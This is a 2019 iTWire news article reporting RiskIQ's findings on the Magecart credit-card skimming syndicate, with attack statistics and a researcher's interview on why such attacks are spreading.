Security Market Segment LS
Monday, 07 October 2019 09:24

Magecart attacks have crossed 2m mark, RiskIQ claims

By
Magecart attacks have crossed 2m mark, RiskIQ claims Image by teguhjati pras from Pixabay

A cyber crime syndicate known as Magecart, which is made up of dozens of sub-groups that indulge in credit card theft by skimming online payment forms, has been found to be implicated in more than two million such attacks.

The security firm RiskIQ said, in a report released on Saturday, that among the 2,086,529 attacks, it had detected 18,000 hosts that were directly breached.

The report, titled MageCart: The State of a Growing Threat and written by the company's threat researchers Jordan Herman and Yonathan Klijnsma, said Magecart had been active for nearly a decade with RiskIQ's first observations about it being on 8 August 2010.

In reply to queries from iTWire, Herman said RiskIQ used the term Magecart as an umbrella term to describe a particular kind of cyber crime.

"[This is} the injection of skimmer code onto e-commerce websites with the intent of stealing credit card and other personal information," he said. "In the past, we limited this moniker to six discrete criminal groups, but, while we still track a number of specific groups carrying out this type of cyber crime, the proliferation of Magecart means that there are more persons involved in this activity than it is practical for us to enumerate."

malvertisements magecart

Asked to cite the reasons for the increase in Magecart attacks, Herman there were several causative factors.

"Firstly, software development that takes security into consideration over sales timelines/goals is the exception, not the rule, and most software releases contain vulnerabilities that will need to be patched later," he said.

"This dynamic is exacerbated when a vendor is small and lacks resources for extensive QA or other security protections. Specific to the Magecart threat, we see this in the focus of some groups on attacking small third-party vendors as a means to gain access to larger, better-resourced organisations."

Herman said that secondly, it was often the case that types of cyber crime continued to proliferate, evolve, and increase for years after they were identified and became well known.

"For example, ransomware has been well known for years and several extremely widespread attacks have demonstrated the need to protect against it and mitigate its effects through security practices, such as proper back-up procedures, yet we continue to see devastating attacks against municipalities such as Baltimore.

length of magecart breach

"That is to say, often attack vectors are developed and implemented by a few people. After the efficacy of the attack is demonstrated, other cyber criminals adopt it, alter it, and use it against new targets. With Magecart attacks, in particular, we have seen an evolution of skimming techniques over time."

Herman said at the moment one could observe a wide range of competence and targeting from different groups carrying out Magecart attacks.

"For example, the attacks on British Airways and Newegg were carried out by a group that specifically targeted these organisations, created bespoke skimmers and C2 domains for their attacks, and carried out those attacks with a high level of technical skill. In comparison, the recent attacks on open Amazon S3 buckets were carried out by a group that did no targeting and inserted their skimmer, which was a copy of another group’s skimmer, into any JS script found on an open bucket, demonstrating low levels of effort/skill."

He said while identifying attack vectors or techniques and disseminating that information was an important part of threat response, it was not enough.

"It is the responsibility of every organisation to work to protect themselves and their customers from these threats and to mitigate any potential effects of attacks that are successfully carried out. That is why RiskIQ works with our clients and other organisations. we have seen affected by Magecart attacks (for instance, we worked with Amazon to help them identify open S3 Buckets and to communicate with the organisations that owned those buckets and get them closed and the skimmer code removed) to help them understand what happened, why, when, and how so that they can protect themselves in the future."

Asked whether it was safe to conclude that convenience was generally the enemy of security, with the former being sought by the tech industry at the expense of the latter, Herman responded: "As I mentioned above, software development that takes security into consideration over sales timelines/goals is the exception, not the rule, and most software releases contain vulnerabilities that will need to be patched later."

Some key points in the report:

  • Seventeen percent of all Malvertisements detected by RiskIQ contain Magecart skimmers;
  • The average length of a Magecart breach is 22 days with many lasting years, or even indefinitely;
  • Shopping platforms such as Magento and OpenCart are the lifeblood of many Magecart groups. RiskIQ has detected 9,688 vulnerable Magento hosts;
  • Magecart infrastructure is vast, with 573 known C2 domains, and 9,189 hosts observed loading C2 domains; and
  • Because Magecart skimmers stay on websites for so long, threat actors are purchasing Magecart infrastructure that's gone offline to assume access to these breached sites.

The full report can be downloaded here after registration.

Graphics: courtesy RiskIQ

BUSINESS WORKS BETTER WITH WINDOWS 1O. MAKE THE SHIFT

You cannot afford to miss this Dell Webinar.

With Windows 7 support ending 14th January 2020, its time to start looking at your options.

This can have significant impacts on your organisation but also presents organisations with an opportunity to fundamentally rethink the way users work.

The Details

When: Thursday, September 26, 2019
Presenter: Dell Technologies
Location: Your Computer

Timezones

QLD, VIC, NSW, ACT & TAS: 11:00 am
SA, NT: 10:30 am
WA: 9:00 am NZ: 1:00 pm

Register and find out all the details you need to know below.

REGISTER!

ADVERTISE ON ITWIRE NEWS SITE & NEWSLETTER

iTWire can help you promote your company, services, and products.

Get more LEADS & MORE SALES

Advertise on the iTWire News Site / Website

Advertise in the iTWire UPDATE / Newsletter

Promote your message via iTWire Sponsored Content/News

Guest Opinion for Home Page exposure

Contact Andrew on 0412 390 000 or email [email protected]

OR CLICK HERE!

Sam Varghese

website statistics

Sam Varghese has been writing for iTWire since 2006, a year after the site came into existence. For nearly a decade thereafter, he wrote mostly about free and open source software, based on his own use of this genre of software. Since May 2016, he has been writing across many areas of technology. He has been a journalist for nearly 40 years in India (Indian Express and Deccan Herald), the UAE (Khaleej Times) and Australia (Daily Commercial News (now defunct) and The Age). His personal blog is titled Irregular Expression.

VENDOR NEWS & EVENTS

REVIEWS

Recent Comments